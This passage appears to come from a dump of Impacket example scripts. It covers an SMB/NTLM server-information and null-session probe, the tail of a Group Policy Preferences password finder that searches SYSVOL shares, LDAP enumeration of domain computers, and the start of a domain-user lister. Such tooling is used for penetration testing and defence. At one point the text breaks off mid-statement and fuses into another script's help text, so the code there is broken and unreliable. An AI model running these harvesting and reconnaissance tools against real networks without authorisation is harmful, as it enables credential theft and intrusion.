0\r\n sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE | SMB.CAP_LARGE_READX | SMB.CAP_LARGE_WRITEX\r\n\r\n blob = SPNEGO_NegTokenInit()\r\n blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]\r\n self._auth = ntlm.getNTLMSSPType1(self._my_name, '', self._SignatureRequired, use_ntlmv2=True)\r\n blob['MechToken'] = self._auth.getData()\r\n\r\n sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)\r\n sessionSetup['Parameters'].getData()\r\n sessionSetup['Data']['SecurityBlob'] = blob.getData()\r\n sessionSetup['Data']['NativeOS'] = 'U\\x00n\\x00i\\x00x\\x00\\x00\\x00'\r\n sessionSetup['Data']['NativeLanMan'] = 'S\\x00a\\x00m\\x00b\\x00a\\x00\\x00'\r\n\r\n return sessionSetup\r\n\r\n def _wrapper(self, sessionResponse):\r\n sessionResponse['SecurityMode'] = 0x0\r\n sessionResponse['DialectRevision'] = SMB_DIALECT\r\n if self._dialects_parameters['SecurityMode'] & SMB.SECURITY_SIGNATURES_ENABLED:\r\n sessionResponse['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED\r\n if self._SignatureRequired:\r\n sessionResponse['SecurityMode'] |= SMB2_NEGOTIATE_SIGNING_REQUIRED\r\n sessionResponse['MaxReadSize'] = self._dialects_parameters['MaxBufferSize']\r\n sessionResponse['MaxWriteSize'] = self._dialects_parameters['MaxBufferSize']\r\n sessionResponse['SystemTime'] = self._to_long_filetime(self._dialects_parameters['LowDateTime'], self._dialects_parameters['HighDateTime'])\r\n sessionResponse['ServerStartTime'] = 0 # SMB1 has not boot time totally\r\n return sessionResponse\r\n\r\n def _to_long_filetime(self, dwLowDateTime, dwHighDateTime):\r\n temp_time = dwHighDateTime\r\n temp_time <<= 32\r\n temp_time |= dwLowDateTime\r\n return temp_time\r\n\r\n\r\nclass SMB3:\r\n def __init__(self, remote_name, remote_host, my_name=None, \r\n sess_port=445, timeout=60, session=None, negSessionResponse=None):\r\n self._NetBIOSSession = session\r\n self._sequenceWindow = 0\r\n self._sessionId = 0\r\n self._timeout = timeout\r\n self._auth = None\r\n\r\n if session is None:\r\n self._NetBIOSSession = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, nmb.TYPE_SERVER, sess_port, timeout)\r\n else:\r\n self._sequenceWindow += 1\r\n\r\n self._negotiateResponse = self._negotiateSession(negSessionResponse)\r\n\r\n def GetNegotiateResponse(self):\r\n return self._negotiateResponse\r\n\r\n def GetChallange(self):\r\n packet = self._createSessionSetupRequest(self._negotiateResponse['DialectRevision'])\r\n\r\n self.send(packet)\r\n self._answer = self.receive()\r\n\r\n sessionSetupResponse = SMB2SessionSetup_Response(self._answer['Data'])\r\n self._respToken = SPNEGO_NegTokenResp(sessionSetupResponse['Buffer'])\r\n ntlmChallenge = ntlm.NTLMAuthChallenge(self._respToken['ResponseToken'])\r\n\r\n return ntlmChallenge\r\n\r\n def Authenticate(self):\r\n packet = SMB2Packet()\r\n if self.GetNegotiateResponse()['DialectRevision'] >= SMB2_DIALECT_30:\r\n packet = SMB3Packet()\r\n packet['Command'] = SMB2_SESSION_SETUP\r\n\r\n if self._answer.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED):\r\n self._sessionId = self._answer['SessionID']\r\n type3, _ = ntlm.getNTLMSSPType3(self._auth, self._respToken['ResponseToken'], '', '', '', '', '')\r\n\r\n respToken2 = SPNEGO_NegTokenResp()\r\n respToken2['ResponseToken'] = type3.getData()\r\n\r\n sessionSetup = SMB2SessionSetup()\r\n sessionSetup['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED\r\n sessionSetup['SecurityBufferLength'] = len(respToken2)\r\n sessionSetup['Buffer'] = respToken2.getData()\r\n packet['Data'] = sessionSetup\r\n\r\n self.send(packet)\r\n packet = self.receive()\r\n\r\n try:\r\n return packet.isValidAnswer(STATUS_SUCCESS)\r\n except:\r\n return False\r\n\r\n def send(self, packet):\r\n packet['MessageID'] = self._sequenceWindow\r\n self._sequenceWindow += 1\r\n\r\n packet['SessionID'] = self._sessionId\r\n packet['CreditCharge'] = 1\r\n messageId = packet['MessageID']\r\n data = packet.getData()\r\n self._NetBIOSSession.send_packet(data)\r\n\r\n return messageId\r\n\r\n def receive(self):\r\n data = self._NetBIOSSession.recv_packet(self._timeout)\r\n packet = SMB2Packet(data.get_trailer())\r\n return packet\r\n\r\n def _negotiateSession(self, negSessionResponse = None):\r\n currentDialect = SMB2_DIALECT_WILDCARD\r\n if negSessionResponse is not None:\r\n negotiateResponse = SMB2Negotiate_Response(negSessionResponse['Data'])\r\n currentDialect = negotiateResponse['DialectRevision']\r\n\r\n if currentDialect == SMB2_DIALECT_WILDCARD:\r\n packet = SMB2Packet()\r\n packet['Command'] = SMB2_NEGOTIATE\r\n negSession = SMB2Negotiate()\r\n negSession['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED\r\n negSession['Capabilities'] = SMB2_GLOBAL_CAP_ENCRYPTION\r\n negSession['ClientGuid'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])\r\n negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]\r\n negSession['DialectCount'] = len(negSession['Dialects'])\r\n packet['Data'] = negSession\r\n\r\n self.send(packet)\r\n answer = self.receive()\r\n if answer.isValidAnswer(STATUS_SUCCESS):\r\n negotiateResponse = SMB2Negotiate_Response(answer['Data'])\r\n\r\n return negotiateResponse\r\n\r\n def _createSessionSetupRequest(self, dialect):\r\n sessionSetup = SMB2SessionSetup()\r\n sessionSetup['Flags'] = 0\r\n\r\n blob = SPNEGO_NegTokenInit()\r\n blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]\r\n\r\n self._auth = ntlm.getNTLMSSPType1('', '', False)\r\n blob['MechToken'] = self._auth.getData()\r\n\r\n sessionSetup['SecurityBufferLength'] = len(blob)\r\n sessionSetup['Buffer'] = blob.getData()\r\n\r\n packet = SMB2Packet()\r\n if dialect >= SMB2_DIALECT_30:\r\n packet = SMB3Packet()\r\n packet['Command'] = SMB2_SESSION_SETUP\r\n packet['Data'] = sessionSetup\r\n\r\n return packet\r\n\r\n\r\nclass SmbConnection:\r\n def __init__(self, ip, hostname, port) -> None:\r\n self.target = ip\r\n self.hostname = hostname\r\n self._sess_port = int(port)\r\n self._timeout = 60\r\n self._myName = self._get_my_name()\r\n self._nmbSession = None\r\n self._SMBConnection = None\r\n\r\n def IsSmb1Enabled(self):\r\n flags1 = SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS\r\n flags2 = SMB.FLAGS2_EXTENDED_SECURITY | SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES\r\n smbv1NegoData = '\\x02NT LM 0.12\\x00'\r\n smb1_enabled = False\r\n try:\r\n self._negotiateSessionWildcard(True, flags1=flags1, flags2=flags2, data=smbv1NegoData)\r\n except Exception as e:\r\n if 'No answer!' in str(e):\r\n smb1_enabled = False\r\n else:\r\n smb1_enabled = True\r\n return smb1_enabled\r\n\r\n def NegotiateSession(self):\r\n flags1 = SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS\r\n flags2 = SMB.FLAGS2_EXTENDED_SECURITY | SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES\r\n\r\n negoData = '\\x02NT LM 0.12\\x00\\x02SMB 2.002\\x00\\x02SMB 2.???\\x00'\r\n if self._sess_port == nmb.NETBIOS_SESSION_PORT:\r\n negoData = '\\x02NT LM 0.12\\x00\\x02SMB 2.002\\x00'\r\n\r\n packet = self._negotiateSessionWildcard(True, flags1=flags1, flags2=flags2, data=negoData)\r\n\r\n if packet[0:1] == b'\\xfe':\r\n self._SMBConnection = SMB3(self.hostname, self.target, self._myName, self._sess_port, \r\n self._timeout, session=self._nmbSession, negSessionResponse=SMB2Packet(packet))\r\n else:\r\n self._SMBConnection = SMB1(self.hostname, self.target, self._myName, self._sess_port, \r\n self._timeout, session=self._nmbSession, negSessionResponse=packet)\r\n return self._SMBConnection.GetNegotiateResponse()\r\n\r\n def GetChallange(self):\r\n return self._SMBConnection.GetChallange()\r\n\r\n def Authenticate(self):\r\n return self._SMBConnection.Authenticate()\r\n\r\n def _negotiateSessionWildcard(self, extended_security=True, flags1=0, flags2=0, data=None):\r\n tries = 0\r\n smbp = NewSMBPacket()\r\n smbp['Flags1'] = flags1\r\n smbp['Flags2'] = flags2 | SMB.FLAGS2_UNICODE\r\n response = None\r\n while tries < 2:\r\n self._nmbSession = nmb.NetBIOSTCPSession(self._myName, self.hostname, self.target, nmb.TYPE_SERVER, self._sess_port, self._timeout)\r\n negSession = SMBCommand(SMB.SMB_COM_NEGOTIATE)\r\n if extended_security is True:\r\n smbp['Flags2'] |= SMB.FLAGS2_EXTENDED_SECURITY\r\n negSession['Data'] = data\r\n smbp.addCommand(negSession)\r\n self._nmbSession.send_packet(smbp.getData())\r\n\r\n try:\r\n response = self._nmbSession.recv_packet(self._timeout)\r\n break\r\n except nmb.NetBIOSError:\r\n smbp['Flags2'] |= SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES | SMB.FLAGS2_UNICODE\r\n smbp['Data'] = []\r\n\r\n tries += 1\r\n\r\n if response is None:\r\n raise Exception('No answer!')\r\n\r\n return response.get_trailer()\r\n\r\n def _get_my_name(self):\r\n myName = socket.gethostname()\r\n i = myName.find('.')\r\n if i > -1:\r\n myName = myName[:i]\r\n return myName\r\n\r\n\r\nclass DumpNtlm:\r\n def __init__(self, ip, hostname, port, protocol) -> None:\r\n self.target = ip\r\n self.hostname = hostname\r\n self._sess_port = int(port)\r\n self._protocol = protocol\r\n self._timeout = 60\r\n\r\n def DisplayInfo(self):\r\n if self._protocol == 'SMB':\r\n self.DisplaySmbInfo()\r\n elif self._protocol == 'RPC':\r\n self.DisplayRpcInfo()\r\n\r\n def DisplayRpcInfo(self):\r\n rpc = RPC(self.target)\r\n\r\n ntlmChallenge = rpc.GetChallange()\r\n self.DisplayChallangeInfo(ntlmChallenge)\r\n\r\n self.DisplayIo({'MaxReadSize': rpc.MaxTrasmitionSize, 'MaxWriteSize': rpc.MaxTrasmitionSize})\r\n\r\n def DisplaySmbInfo(self):\r\n connection = SmbConnection(self.target, self.hostname, self._sess_port)\r\n\r\n negotiation = connection.NegotiateSession()\r\n dialect = negotiation['DialectRevision']\r\n secMode = negotiation['SecurityMode']\r\n\r\n smb1_enabled = connection.IsSmb1Enabled()\r\n\r\n self.DisplayDialect(dialect, smb1_enabled)\r\n self.DisplaySigning(secMode)\r\n self.DisplayIo(negotiation)\r\n self.DisplayTime(negotiation)\r\n\r\n ntlmChallenge = connection.GetChallange()\r\n self.DisplayChallangeInfo(ntlmChallenge)\r\n\r\n nullSession = connection.Authenticate()\r\n self.DisplayNullSession(nullSession)\r\n\r\n\r\n def DisplaySigning(self, secMode):\r\n mode = ''\r\n if (secMode & SMB2_NEGOTIATE_SIGNING_ENABLED) == SMB2_NEGOTIATE_SIGNING_ENABLED:\r\n mode = 'SIGNING_ENABLED'\r\n if (secMode & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED:\r\n mode += ' | SIGNING_REQUIRED'\r\n else:\r\n mode += ' (not required)'\r\n print(\"[+] Server Security : {}\".format(mode))\r\n\r\n\r\n def DisplayDialect(self, dialect, smb1_enabled):\r\n print(\"[+] SMBv1 Enabled : {0}\".format(smb1_enabled))\r\n if dialect == SMB2_DIALECT_002:\r\n print(\"[+] Prefered Dialect: SMB 002\")\r\n elif dialect == SMB2_DIALECT_21:\r\n print(\"[+] Prefered Dialect: SMB 2.1\")\r\n elif dialect == SMB2_DIALECT_30:\r\n print(\"[+] Prefered Dialect: SMB 3.0\")\r\n elif dialect == SMB2_DIALECT_302:\r\n print(\"[+] Prefered Dialect: SMB 3.0.2\")\r\n elif dialect == SMB2_DIALECT_302:\r\n print(\"[+] Prefered Dialect: SMB 3.0.2\")\r\n elif dialect == SMB2_DIALECT_311:\r\n print(\"[+] Prefered Dialect: SMB 3.1.1\")\r\n elif type(dialect) is str:\r\n print(\"[+] Prefered Dialect: {}\".format(dialect)) # SMB1\r\n else:\r\n print(\"[+] Prefered Dialect: 0x{:x}\".format(dialect))\r\n\r\n\r\n def DisplayIo(self, negotiateResponse):\r\n print(\"[+] Max Read Size : {} ({} bytes)\".format(self.__convert_size(negotiateResponse['MaxReadSize']), negotiateResponse['MaxReadSize']))\r\n print(\"[+] Max Write Size : {} ({} bytes)\".format(self.__convert_size(negotiateResponse['MaxWriteSize']), negotiateResponse['MaxWriteSize']))\r\n\r\n\r\n def DisplayTime(self, negotiateResponse):\r\n currentTime = 0 if negotiateResponse['SystemTime'] == 0 else self.__filetime_to_dt(negotiateResponse['SystemTime']).astimezone(timezone.utc)\r\n bootTime = 0 if negotiateResponse['ServerStartTime'] == 0 else self.__filetime_to_dt(negotiateResponse['ServerStartTime']).astimezone(timezone.utc)\r\n print(\"[+] Current Time : {}\".format(currentTime))\r\n if bootTime != 0:\r\n print(\"[+] Boot Time : {}\".format(bootTime))\r\n print(\"[+] Server Up Time : {}\".format(currentTime - bootTime))\r\n\r\n\r\n def DisplayChallangeInfo(self, challange):\r\n if challange['TargetInfoFields_len'] > 0:\r\n av_pairs = ntlm.AV_PAIRS(challange['TargetInfoFields'][:challange['TargetInfoFields_len']])\r\n if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None:\r\n try:\r\n print(\"[+] Name : {}\".format(av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')))\r\n except:\r\n pass\r\n if av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME] is not None:\r\n try:\r\n print(\"[+] Domain : {}\".format(av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le')))\r\n except:\r\n pass\r\n if av_pairs[ntlm.NTLMSSP_AV_DNS_TREENAME] is not None:\r\n try:\r\n print(\"[+] DNS Tree Name : {}\".format(av_pairs[ntlm.NTLMSSP_AV_DNS_TREENAME][1].decode('utf-16le')))\r\n except:\r\n pass\r\n if av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME] is not None:\r\n try:\r\n print(\"[+] DNS Domain Name : {}\".format(av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1].decode('utf-16le')))\r\n except:\r\n pass\r\n if av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME] is not None:\r\n try:\r\n print(\"[+] DNS Host Name : {}\".format(av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME][1].decode('utf-16le')))\r\n except:\r\n pass\r\n # if av_pairs[ntlm.NTLMSSP_AV_TIME] is not None:\r\n # try:\r\n # timelong = struct.unpack('= 4:\r\n print(\"[+] OS : {}\".format(\"Windows NT %d.%d Build %d\" % (indexbytes(version,0), indexbytes(version,1), struct.unpack(' or LOCAL (if you want to parse local files)\")\n parser.add_argument(\"-xmlfile\", type=str, required=False, default=None, help=\"Group Policy Preferences XML files to parse\")\n parser.add_argument(\"-share\", type=str, required=False, default=\"SYSVOL\", help=\"SMB Share\")\n parser.add_argument(\"-base-dir\", type=str, required=False, default=\"/\", help=\"Directory to search in (Default: /)\")\n parser.add_argument(\"-ts\", action=\"store_true\", help=\"Adds timestamp to every logging output\")\n parser.add_argument(\"-debug\", action=\"store_true\", help=\"Turn DEBUG output ON\")\n\n group = parser.add_argument_group('authentication')\n group.add_argument(\"-hashes\", action=\"store\", metavar=\"LMHASH:NTHASH\", help=\"NTLM hashes, format is LMHASH:NTHASH\")\n group.add_argument(\"-no-pass\", action=\"store_true\", help=\"Don't ask for password (useful for -k)\")\n group.add_argument(\"-k\", action=\"store_true\", help=\"Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line\")\n group.add_argument(\"-aesKey\", action=\"store\", metavar=\"hex key\", help=\"AES key to use for Kerberos Authentication (128 or 256 bits)\")\n\n group = parser.add_argument_group(\"connection\")\n\n group.add_argument(\"-dc-ip\", action=\"store\", metavar=\"ip address\", help=\"IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\")\n group.add_argument(\"-target-ip\", action=\"store\", metavar=\"ip address\", help=\"IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\")\n group.add_argument(\"-port\", choices=[\"139\", \"445\"], nargs=\"?\", default=\"445\", metavar=\"destination port\", help=\"Destination port to connect to SMB Server\")\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser.parse_args()\n\n\ndef parse_target(args):\n domain, username, password, address = utils.parse_target(args.target)\n\n if args.target_ip is None:\n args.target_ip = address\n\n if domain is None:\n domain = \"\"\n\n if len(password) == 0 and len(username) != 0 and args.hashes is None and args.no_pass is False and args.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if args.aesKey is not None:\n args.k = True\n\n if args.hashes is not None:\n lmhash, nthash = args.hashes.split(\":\")\n else:\n lmhash, nthash = \"\", \"\"\n\n return domain, username, password, address, lmhash, nthash\n\ndef init_smb_session(args, domain, username, password, address, lmhash, nthash):\n smbClient = SMBConnection(address, args.target_ip, sess_port=int(args.port))\n dialect = smbClient.getDialect()\n if dialect == SMB_DIALECT:\n logging.debug(\"SMBv1 dialect used\")\n elif dialect == SMB2_DIALECT_002:\n logging.debug(\"SMBv2.0 dialect used\")\n elif dialect == SMB2_DIALECT_21:\n logging.debug(\"SMBv2.1 dialect used\")\n else:\n logging.debug(\"SMBv3.0 dialect used\")\n if args.k is True:\n smbClient.kerberosLogin(username, password, domain, lmhash, nthash, args.aesKey, args.dc_ip)\n else:\n smbClient.login(username, password, domain, lmhash, nthash)\n if smbClient.isGuestSession() > 0:\n logging.debug(\"GUEST Session Granted\")\n else:\n logging.debug(\"USER Session Granted\")\n return smbClient\n\n\nif __name__ == '__main__':\n print(version.BANNER)\n args = parse_args()\n logger.init(args.ts, args.debug)\n\n if args.target.upper() == \"LOCAL\":\n if args.xmlfile is not None:\n # Only given decrypt XML file\n if os.path.exists(args.xmlfile):\n g = GetGPPasswords(None, None)\n logging.debug(\"Opening %s XML file for reading ...\" % args.xmlfile)\n f = open(args.xmlfile, \"r\")\n rawdata = \"\".join(f.readlines())\n f.close()\n results = g.parse_xmlfile_content(args.xmlfile, rawdata)\n g.show(results)\n else:\n print(\"[!] File does not exists or is not readable.\")\n else:\n domain, username, password, address, lmhash, nthash = parse_target(args)\n try:\n smbClient = init_smb_session(args, domain, username, password, address, lmhash, nthash)\n g = GetGPPasswords(smbClient, args.share)\n g.list_shares()\n g.find_cpasswords(args.base_dir)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/GetADComputers.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script is inspired from Alberto Solino's -> imacket-GetAdUsers. \n# This script will make a LDAP query to DC and gather information about all the COMPUTERS present in DC.\n# Also, has the capablity of resolving the IP addresses of the idenitifed hosts by making a DNS query of A record to the DC. \n#\n# Inspired from author:\n# Alberto Solino (@agsolino)\n#\n# Author:\n# Fowz Masood (https://www.linkedin.com/in/f-masood/)\n# Please let me know of any improvements / suggestions or bugs. \n#\n#\n# Reference for:\n# LDAP\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport argparse\nimport logging\nimport sys\nimport dns.resolver\nfrom datetime import datetime\n\nfrom impacket import version\nfrom impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity, ldap_login\nfrom impacket.ldap import ldap, ldapasn1\n\n\nclass GetADComputers:\n def __init__(self, username, password, domain, cmdLineOptions):\n self.options = cmdLineOptions\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__target = None\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = cmdLineOptions.aesKey\n self.__doKerberos = cmdLineOptions.k\n #[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost\n self.__kdcIP = cmdLineOptions.dc_ip\n self.__kdcHost = cmdLineOptions.dc_host\n self.__requestUser = cmdLineOptions.user\n self.__resolveIP = cmdLineOptions.resolveIP\n if cmdLineOptions.hashes is not None:\n self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n # Create the baseDN\n domainParts = self.__domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n # Let's calculate the header and format\n if self.__resolveIP : #resolveIP flag is used, we will try to resolve the IP address\n self.__header = [\"SAM AcctName\", \"DNS Hostname\", \"OS Version\", \"OS\", \"IPAddress\"]\n # Since we won't process all rows at once, this will be fixed lengths\n self.__colLen = [15, 35, 15, 35, 20]\n self.__outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(self.__colLen)])\n\n else:\n self.__header = [\"SAM AcctName\", \"DNS Hostname\", \"OS Version\", \"OS\"]\n # Since we won't process all rows at once, this will be fixed lengths\n self.__colLen = [15, 35, 15, 20]\n self.__outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(self.__colLen)])\n\n @staticmethod\n def getUnixTime(t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def processRecord(self, item):\n if isinstance(item, ldapasn1.SearchResultEntry) is not True:\n return\n sAMAccountName = ''\n dNSHostName = ''\n operatingSystem = ''\n operatingSystemVersion = ''\n try:\n\n if(self.__resolveIP): #will resolve the IP address\n resolvedIPAddress=''\n resolveIP = dns.resolver.Resolver()\n dns.resolver.default_resolver = dns.resolver.Resolver(configure=False) #Dont want to use the default DNS in /etc/resolv.conf\n dns.resolver.default_resolver.nameservers = [self.__kdcIP] #converting DCIP from STRING to LIST\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is True:\n # sAMAccountName\n sAMAccountName = attribute['vals'][0].asOctets().decode('utf-8')\n if str(attribute['type']) == 'dNSHostName':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:\n # dNSHostName + IP resolve\n dNSHostName = attribute['vals'][0].asOctets().decode('utf-8')\n try:\n answers=dns.resolver.resolve(attribute['vals'][0].asOctets().decode('utf-8'),'A',tcp=True)\n for rdata in answers:\n resolvedIPAddress = rdata.address\n except:\n resolvedIPAddress = ''\n if str(attribute['type']) == 'operatingSystem':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:\n # operatingSystem\n operatingSystem = attribute['vals'][0].asOctets().decode('utf-8')\n if str(attribute['type']) == 'operatingSystemVersion':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:\n # operatingSystemVersion\n operatingSystemVersion = attribute['vals'][0].asOctets().decode('utf-8')\n print((self.__outputFormat.format(*[sAMAccountName, dNSHostName, operatingSystemVersion,operatingSystem,resolvedIPAddress])))\n\n else: #won't resolve the IP address\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is True:\n # sAMAccountName\n sAMAccountName = attribute['vals'][0].asOctets().decode('utf-8')\n if str(attribute['type']) == 'dNSHostName':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:\n # dNSHostName\n dNSHostName = attribute['vals'][0].asOctets().decode('utf-8')\n if str(attribute['type']) == 'operatingSystem':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:\n # operatingSystem\n operatingSystem = attribute['vals'][0].asOctets().decode('utf-8')\n if str(attribute['type']) == 'operatingSystemVersion':\n if attribute['vals'][0].asOctets().decode('utf-8').endswith('$') is False:\n # operatingSystemVersion\n operatingSystemVersion = attribute['vals'][0].asOctets().decode('utf-8')\n print((self.__outputFormat.format(*[sAMAccountName, dNSHostName, operatingSystemVersion,operatingSystem])))\n \n \n\n except Exception as e:\n logging.debug(\"Exception\", exc_info=True)\n logging.error('Skipping item, cannot process due to error %s' % str(e))\n pass\n\n def run(self):\n # Connect to LDAP\n ldapConnection = ldap_login(self.__target, self.baseDN, self.__kdcIP, self.__kdcHost, self.__doKerberos, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)\n # updating \"self.__target\" as it may have changed in the ldap_login processing\n self.__target = ldapConnection._dstHost\n logging.info('Querying %s for information about domain.' % self.__target)\n # Print header\n print((self.__outputFormat.format(*self.__header)))\n print((' '.join(['-' * itemLen for itemLen in self.__colLen])))\n\t\n # Building the search filter\n #searchFilter = '(objectCategory=computer)'\n searchFilter = '(&(objectCategory=computer)(objectClass=computer))'\n\n try:\n logging.debug('Search Filter=%s' % searchFilter)\n sc = ldap.SimplePagedResultsControl(size=100)\n \n ldapConnection.search(searchFilter=searchFilter,attributes=['sAMAccountName','dNSHostName','operatingSystem','operatingSystemVersion'],sizeLimit=0, searchControls = [sc], perRecordCallback=self.processRecord)\n \n except ldap.LDAPSearchError:\n raise\n\n ldapConnection.close()\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print((version.BANNER))\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Queries target domain for computer data\")\n\n parser.add_argument('target', action='store', help='domain[/username[:password]]')\n parser.add_argument('-user', action='store', metavar='username', help='Requests data for specific user ')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-resolveIP', action='store_true', help='Tries to resolve the IP address of computer objects, by performing the nslookup on the DC.')\n \n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n \n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) '\n 'specified in the target parameter')\n group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '\n 'If ommited, the domain part (FQDN) '\n 'specified in the account parameter will be used')\n\n \n\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n try:\n executer = GetADComputers(username, password, domain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/GetADUsers.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will gather data about the domain's users and their corresponding email addresses. It will also\n# include some extra information about last logon and last password set attributes.\n# You can enable or disable the the attributes shown in the final table by changing the values in line 184 and\n# headers in line 190.\n# If no entries are returned that means users don't have email addresses specified. If so, you can use the\n# -all-users parameter.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# LDAP\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport argparse\nimport logging\nimport sys\nfrom datetime import datetime\n\nfrom impacket import version\nfrom impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity, ldap_login\nfrom impacket.ldap import ldap, ldapasn1\n\nclass GetADUsers:\n def __init__(self, username, password, domain, cmdLineOptions):\n self.options = cmdLineOptions\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__target = None\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = cmdLineOptions.aesKey\n self.__doKerberos = cmdLineOptions.k\n #[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost\n self.__kdcIP = cmdLineOptions.dc_ip\n self.__kdcHost = cmdLineOptions.dc_host\n self.__requestUser = cmdLineOptions.user\n self.__all = cmdLineOptions.all\n if cmdLineOptions.hashes is not None:\n self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n # Create the baseDN\n domainParts = self.__domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n # Let's calculate the header and format\n self.__header = [\"Name\", \"Email\", \"PasswordLastSet\", \"LastLogon\"]\n # Since we won't process all rows at once, this will be fixed lengths\n 